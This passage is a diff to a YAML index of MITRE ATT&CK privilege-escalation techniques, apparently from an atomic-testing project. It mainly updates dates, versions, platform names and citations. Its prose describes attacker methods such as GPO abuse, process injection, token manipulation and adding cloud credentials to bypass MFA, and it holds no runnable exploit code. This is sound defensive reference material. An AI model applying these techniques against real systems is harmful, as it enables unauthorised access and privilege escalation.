         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -18157,12 +18484,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18170,14 +18497,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18192,6 +18518,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -18200,18 +18527,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -18243,9 +18570,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18317,7 +18641,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18344,7 +18667,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18370,13 +18693,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18497,12 +18818,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18534,11 +18854,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18579,11 +18898,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18639,12 +18957,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18701,7 +19018,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18771,7 +19087,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18881,7 +19196,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18935,7 +19249,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18968,13 +19282,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -19036,10 +19348,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -19097,7 +19408,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -19139,7 +19449,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -19198,8 +19508,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -19229,7 +19537,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19264,12 +19572,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19346,7 +19652,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19385,7 +19690,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19434,8 +19739,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19467,7 +19770,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19515,13 +19818,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19534,16 +19835,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19555,16 +19856,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19619,7 +19920,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19642,7 +19942,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19686,8 +19986,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19764,7 +20062,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19792,8 +20090,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19852,23 +20148,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19878,11 +20173,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19893,12 +20192,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19907,6 +20213,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19915,13 +20222,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19947,10 +20257,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19959,10 +20277,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19979,9 +20307,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -20045,7 +20370,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -20134,7 +20458,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -20192,7 +20515,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20217,12 +20540,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20248,7 +20570,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20262,7 +20583,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20289,8 +20609,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
